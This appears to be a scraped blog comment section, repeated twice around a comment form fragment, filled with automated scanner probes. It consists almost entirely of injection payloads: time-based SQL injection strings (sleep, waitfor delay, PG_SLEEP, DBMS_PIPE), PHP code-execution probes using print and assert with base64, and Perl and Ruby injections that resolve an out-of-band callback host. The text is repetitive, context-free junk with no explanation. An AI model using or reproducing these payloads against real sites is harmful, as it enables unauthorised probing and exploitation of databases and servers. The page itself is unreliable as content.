testcomment
555
${@print(md5(31337))}
1
JeMli9XY
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
testcomment””
NS6o28lk
if(now()=sysdate(),sleep(15),0)
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
gsRCOmEG’; waitfor delay ‘0:0:15’ —
-5 OR 444=(SELECT 444 FROM PG_SLEEP(15))–
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
lmZOxhfP
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-1; waitfor delay ‘0:0:15’ —
Uy9A4NHy’; waitfor delay ‘0:0:15’ —
-5) OR 949=(SELECT 949 FROM PG_SLEEP(15))–
YrSWb5tD’ OR 56=(SELECT 56 FROM PG_SLEEP(15))–
su3PpGN6′)) OR 991=(SELECT 991 FROM PG_SLEEP(15))–
wp-comments-post.php
‘.gethostbyname(lc(‘hitkz’.’gmexximl50cc4.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(103).chr(80).chr(103).chr(67).’
PefxnnJT
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
18tbAQ5S’; waitfor delay ‘0:0:15’ —
-5 OR 198=(SELECT 198 FROM PG_SLEEP(15))–
-5) OR 513=(SELECT 513 FROM PG_SLEEP(15))–
fqbCmDEO’ OR 166=(SELECT 166 FROM PG_SLEEP(15))–
tcPKy5yv’)) OR 584=(SELECT 584 FROM PG_SLEEP(15))–
fWU1X2uk’; waitfor delay ‘0:0:15’ —
-5 OR 188=(SELECT 188 FROM PG_SLEEP(15))–
-5) OR 776=(SELECT 776 FROM PG_SLEEP(15))–
r9kB3NPB’ OR 671=(SELECT 671 FROM PG_SLEEP(15))–
5TidE2Yb’) OR 753=(SELECT 753 FROM PG_SLEEP(15))–
mwYfe8h7′; waitfor delay ‘0:0:15’ —
-5) OR 983=(SELECT 983 FROM PG_SLEEP(15))–
R9waKMXt’ OR 525=(SELECT 525 FROM PG_SLEEP(15))–
qS7mcr42′)) OR 201=(SELECT 201 FROM PG_SLEEP(15))–
1′”
1GW6xlSk
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
“+”A”.concat(70-3).concat(22*4).concat(101).concat(85).concat(99).concat(87)+(require”socket” Socket.gethostbyname(“hitld”+”yxpfutkrde5d5.bxss.me.”)[3].to_s)+”
-5 OR 916=(SELECT 916 FROM PG_SLEEP(15))–
-5) OR 136=(SELECT 136 FROM PG_SLEEP(15))–
-1)) OR 79=(SELECT 79 FROM PG_SLEEP(15))–
Your email address will not be published. Required fields are marked *
Comment *
Save my name, email, and website in this browser for the next time I comment.
Δ
testcomment
555
555
${@print(md5(31337))}
1
555
555
555
JeMli9XY
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
testcomment””
555
555
555
1
NS6o28lk
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
gsRCOmEG’; waitfor delay ‘0:0:15’ —
-5 OR 444=(SELECT 444 FROM PG_SLEEP(15))–
555
555
555
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
lmZOxhfP
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-1; waitfor delay ‘0:0:15’ —
Uy9A4NHy’; waitfor delay ‘0:0:15’ —
-5) OR 949=(SELECT 949 FROM PG_SLEEP(15))–
YrSWb5tD’ OR 56=(SELECT 56 FROM PG_SLEEP(15))–
su3PpGN6′)) OR 991=(SELECT 991 FROM PG_SLEEP(15))–
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
1
wp-comments-post.php
‘.gethostbyname(lc(‘hitkz’.’gmexximl50cc4.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(103).chr(80).chr(103).chr(67).’
1
PefxnnJT
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
18tbAQ5S’; waitfor delay ‘0:0:15’ —
-5 OR 198=(SELECT 198 FROM PG_SLEEP(15))–
-5) OR 513=(SELECT 513 FROM PG_SLEEP(15))–
fqbCmDEO’ OR 166=(SELECT 166 FROM PG_SLEEP(15))–
tcPKy5yv’)) OR 584=(SELECT 584 FROM PG_SLEEP(15))–
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555
555
555
555
555
555
fWU1X2uk’; waitfor delay ‘0:0:15’ —
-5 OR 188=(SELECT 188 FROM PG_SLEEP(15))–
-5) OR 776=(SELECT 776 FROM PG_SLEEP(15))–
r9kB3NPB’ OR 671=(SELECT 671 FROM PG_SLEEP(15))–
5TidE2Yb’) OR 753=(SELECT 753 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
mwYfe8h7′; waitfor delay ‘0:0:15’ —
-5) OR 983=(SELECT 983 FROM PG_SLEEP(15))–
R9waKMXt’ OR 525=(SELECT 525 FROM PG_SLEEP(15))–
qS7mcr42′)) OR 201=(SELECT 201 FROM PG_SLEEP(15))–
1′”
1GW6xlSk
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
“+”A”.concat(70-3).concat(22*4).concat(101).concat(85).concat(99).concat(87)+(require”socket”
Socket.gethostbyname(“hitld”+”yxpfutkrde5d5.bxss.me.”)[3].to_s)+”
-5 OR 916=(SELECT 916 FROM PG_SLEEP(15))–
-5) OR 136=(SELECT 136 FROM PG_SLEEP(15))–
-1)) OR 79=(SELECT 79 FROM PG_SLEEP(15))–